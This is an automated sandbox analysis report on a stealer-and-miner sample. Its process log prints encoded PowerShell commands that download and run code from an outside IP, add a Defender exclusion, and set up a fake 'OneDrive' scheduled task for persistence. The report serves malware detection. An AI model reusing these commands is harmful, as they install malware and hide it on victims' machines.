Malware Analysis Report

2025-04-03 09:47

Sample ID 230506-ft9r5sad6y
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags
systembc xmrig evasion miner trojan redline [ pro ] infostealer persistence spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

systembc xmrig evasion miner trojan redline [ pro ] infostealer persistence spyware

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

SystemBC

xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Identifies Wine through registry keys

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 05:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 05:11

Reported

2023-05-06 05:13

Platform

win7-20230220-en

Max time kernel

150s

Max time network

135s

Command Line

C:\Windows\Explorer.EXE

Signatures

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\dllhost.exe | N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\dllhost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\dllhost.exe | N/A

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\dllhost.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 904 set thread context of 112 | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | C:\Windows\System32\conhost.exe
PID 904 set thread context of 2032 | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | C:\Windows\System32\conhost.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\lsass.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1380 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1952 wrote to memory of 1356 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1356 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1356 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1912 wrote to memory of 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 1912 wrote to memory of 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 1912 wrote to memory of 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 1636 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1620 wrote to memory of 904 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1620 wrote to memory of 904 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1620 wrote to memory of 904 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1636 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1924 wrote to memory of 748 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 748 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 748 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe
PID 316 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 316 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 316 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 904 wrote to memory of 112 | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | C:\Windows\System32\conhost.exe
PID 1800 wrote to memory of 1612 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1216 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\WerFault.exe
PID 1800 wrote to memory of 1216 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\WerFault.exe
PID 1800 wrote to memory of 1216 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\system32\taskeng.exe

